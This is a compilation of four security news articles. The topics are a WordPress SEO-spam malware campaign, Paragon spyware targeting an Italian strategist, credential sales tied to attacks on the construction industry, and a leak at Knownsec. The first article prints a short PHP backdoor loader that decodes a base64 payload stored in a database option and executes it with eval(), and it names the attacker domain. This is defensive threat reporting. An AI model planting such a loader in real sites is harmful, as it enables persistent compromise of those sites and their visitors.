Cybercriminals are increasingly targeting websites to inject malicious links and boost their search engine optimization rankings through sophisticated blackhat SEO tactics.

This campaign primarily focuses on online casino spam, which has become the most prevalent type of spam content affecting compromised websites.

Attackers exploit vulnerabilities in WordPress installations to insert spam content promoting online casinos, particularly those targeting international markets where gambling remains heavily regulated.

The attackers employ multiple techniques to maintain persistence and evade detection. They hijack legitimate website pages by creating duplicate directories with identical names, effectively replacing original content with spam-filled landing pages.

When visitors or search engines attempt to access pages, they are redirected to bogus directories containing links to undesirable casino websites.

This technique exploits how Apache and Nginx web servers resolve filesystem paths before handing requests to WordPress rewrite engines.

Sucuri security researchers identified a particularly sophisticated variant of this malware that incorporates multiple layers of redundancy.

The malicious code is strategically planted in both theme and plugin files to ensure survival even if one component is discovered.

Rather than creating easily detectable spam directories, this advanced version stores its payload within the WordPress database using deceptive option names.

Multi-Layered Infection Mechanism

The infection operates through clever database manipulation and dynamic content fetching.

Researchers discovered malicious code embedded at the bottom of the theme’s functions.php file.

The code retrieves a base64-encoded payload from the database using the option name wp_footers_logic and executes it through PHP’s eval() function:-

$cloak = get_option('wp_footers_logic');
if ($cloak) {
    $decoded = base64_decode($cloak);
    eval($decoded);
}

If eval() is disabled, the malware writes the payload to wp-content/cache/style.dat as a fallback mechanism. The decoded payload monitors incoming requests for specific URL paths, checking for cached spam content.

When triggered, it fetches content from attacker-controlled domains like browsec[.]xyz. To ensure persistence, attackers plant reinfection code in additional plugin files. This code periodically searches for distinctive markers.

If markers are missing, the code automatically reappends the malicious payload to both the theme’s functions.php file and the primary file of the first active plugin, demonstrating sophisticated SEO spam campaigns.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Threat Actors Actively Hacking Websites to Inject Malicious Links and Boost their SEO appeared first on Cyber Security News.

Francesco Nicodemo, a prominent political communications strategist and former Democratic Party communications director, has been identified as a new target in the expanding Paragon spyware surveillance campaign.

The revelation marks a concerning escalation in the scope of sophisticated digital espionage operations targeting political figures in Italy.

Nicodemo, who currently leads the communications agency Lievito, discovered the breach on January 31, 2025, when he received a suspicious WhatsApp message while traveling in Vienna.

The agency has managed thirteen election campaigns throughout 2024, including successful center-left victories in Perugia, Liguria, and Umbria.

The spyware infection remained active on Nicodemo’s Android device even after he switched to an iPhone, with the compromised phone sitting unused at his residence.

Fanpage security researchers identified the attack pattern after cross-referencing similar incidents involving journalists and activists.

The timing of the surveillance coincided with several high-profile regional elections, raising questions about potential espionage targeting opposition political strategies and communications.

John Scott Railton from Citizen Lab, a cybersecurity watchdog organization, contacted Nicodemo multiple times through international calls before confirming the breach.

The researcher emphasized the severity of the attack, noting that only a small number of Italian targets were selected for this particular espionage operation.

The compromised device potentially exposed sensitive communications with Democratic Party parliamentarians, election candidates, and senior party officials.

Infection Vector and Delivery Mechanism

The Paragon Graphite spyware utilizes a sophisticated multi-stage infection process that begins with a deceptive WhatsApp message appearing to originate from legitimate WhatsApp Support infrastructure.

Unlike traditional phishing attacks that require user interaction with malicious links, this spyware variant can establish persistence through zero-click exploitation techniques.

The malware leverages vulnerabilities in messaging protocols to deploy surveillance modules capable of extracting messages, call logs, and location data from both active and inactive devices.

Security experts note that the spyware maintains operational capability even when the target device is powered down, suggesting advanced firmware-level compromise techniques that bypass standard operating system security controls.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Italian Adviser Becomes Latest Target in Expanding Paragon Graphite Spyware Surveillance Case appeared first on Cyber Security News.

The construction industry has emerged as a lucrative target for advanced persistent threat groups and organized cybercriminal networks seeking unauthorized access to corporate systems.

State-sponsored APT groups from China, Russia, Iran, and North Korea are increasingly focusing their operations on the building and construction sector, exploiting the industry’s rapid digital transformation and heavy reliance on third-party vendors.

These threat actors are targeting construction companies to steal login credentials for Remote Desktop Protocol (RDP), Secure Shell (SSH), and Citrix systems, which serve as gateways to sensitive project data, financial records, and proprietary blueprints.

The attacks exploit weak security practices and outdated legacy systems prevalent throughout the construction sector.

Cybercriminals employ phishing emails, compromised credentials, and supply chain vulnerabilities to establish initial footholds within target networks.

The sector’s widespread use of cloud-based project management tools and insufficient employee cybersecurity training create additional opportunities for exploitation.

Once threat actors gain access, they leverage interconnected systems to move laterally across networks and exfiltrate valuable data including contracts, Building Information Modeling (BIM) files, and personal information of employees and clients.

Rapid7 security researchers identified that many threat actors now purchase access to construction company networks through underground forums rather than conducting resource-intensive initial compromise operations themselves.

These dark web marketplaces feature intermediaries and brokers who sell credentials to previously breached networks across all industries, with the construction sector representing a significant portion of available access.

Access types traded include VPN, RDP, SSH, Citrix, SMTP, and FTP credentials, with pricing determined by the target organization’s size and network complexity.

The evolving threat landscape underscores the urgent need for construction companies to implement comprehensive cybersecurity measures.

The complex, collaborative nature of construction projects and the frequent exchange of sensitive documents amplify the risk, making the sector a prime target for corporate espionage, financial gain, and extortion through ransomware campaigns designed to disrupt project timelines.

Dark Web Credential Marketplaces

The underground economy for stolen construction industry credentials has flourished in recent months, with specialized forums facilitating the sale of network access to threat actors worldwide.

Rapid7 researchers observed numerous listings advertising access to construction company networks, with prices varying based on the target’s revenue, geographic location, and the level of access provided.

These marketplaces operate with sophisticated rating systems and escrow services, providing buyers with assurances about the validity of purchased credentials.

Sellers often provide screenshots of active sessions or network diagrams to verify their access, creating a streamlined supply chain that lowers the barrier to entry for cybercriminal operations targeting the construction sector.

This illustrates another example of VPN, RDP, and Cpanel access to construction companies being offered for sale, highlighting the variety of access types available to potential attackers.

The availability of these credentials enables ransomware operators and data extortion groups to quickly scale their operations, bypassing traditional defense mechanisms and exploiting the trust inherent in legitimate remote access tools.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post APT Groups Attacking Construction Industry Networks to Steal RDP, SSH and Citrix Logins appeared first on Cyber Security News.

In early November 2025, Knownsec, one of China’s largest cybersecurity firms with direct government ties, experienced a catastrophic data breach that exposed over 12,000 classified documents.

The incident revealed the scale and sophistication of state-sponsored cyber operations, including detailed information about cyber weapons, internal hacking tools, and a comprehensive global surveillance target list.

This breach marks a significant turning point in understanding the technical capabilities and geopolitical scope of organized state-level cyber espionage operations.

The compromised files contained far more than routine business data. Hackers successfully extracted technical documentation detailing collaborations between Knownsec and various Chinese government departments, complete source code for proprietary internal tools, and spreadsheets listing 80 overseas targets that were allegedly already compromised.

The leaked materials initially surfaced on GitHub before rapid removal, though copies had already circulated extensively within the cybersecurity research community.

Founded in 2007 and backed by Tencent in 2015, Knownsec operated over 900 employees across multiple Chinese offices, positioning the company as a critical node in China’s cyber infrastructure.

Mrxn security analysts identified that the leaked documents reveal a comprehensive arsenal of offensive cyber capabilities.

The company maintained sophisticated libraries of Remote Access Trojans capable of compromising Windows, Linux, macOS, iOS, and Android systems.

Particularly concerning were Android-specific tools designed to extract message histories from Chinese chat applications and Telegram, enabling widespread communications interception.

The most revealing aspect of this breach concerns the geographic scope and data volume of compromised targets.

International locations named in the leaked spreadsheets include Japan, Vietnam, India, Indonesia, Nigeria, and the United Kingdom.

Data Breach

The documents detailed stolen data sets of staggering proportions: 95 gigabytes of immigration records from India, 3 terabytes of call records from South Korean telecommunications company LG U Plus, and 459 gigabytes of road planning data from Taiwan.

These figures demonstrate systematic long-term access to critical infrastructure and sensitive government information across multiple nations.

Beyond software tools, the leaked documents revealed hardware-based attack mechanisms, including a specially designed malicious power bank capable of covertly uploading data from connected victims’ devices.

This technical sophistication indicates resourced, sustained operations targeting high-value intelligence collection.

The Chinese government subsequently denied knowledge of the breach, with Foreign Ministry spokesperson Mao Ning claiming unfamiliarity with the incident while reiterating official opposition to cyberattacks.

However, this response notably avoided denying state support for cybersecurity firms conducting intelligence activities, suggesting such operations are viewed as legitimate national security functions.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Chinese Cybersecurity Firm Data Breach Exposes State-Sponsored Hackers Cyber Weapons and Target List appeared first on Cyber Security News.